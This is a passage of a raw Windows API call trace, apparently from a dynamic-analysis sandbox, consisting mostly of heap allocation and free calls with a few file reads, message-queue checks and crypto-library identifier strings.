HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0158.638] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0158.638] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xf73d, lpOverlapped=0x0) returned 1 [0158.643] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0158.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf73d) returned 0x9e5190 [0158.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0158.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf73d) returned 0x9f48d8 [0158.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0158.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.646] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf73d) returned 0x9e5190 [0158.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0158.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0158.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.647] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf73d) returned 0x9e5190 [0158.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0158.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf73d) returned 0xa04020 [0158.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0158.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0158.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.650] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0158.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0158.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0158.650] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0158.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.651] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0158.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0158.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0158.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.652] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.653] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0158.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.654] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0158.657] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0158.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0158.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0158.657] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0158.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.659] RtlAllocateHeap (HeapHandle=0x8a0000, 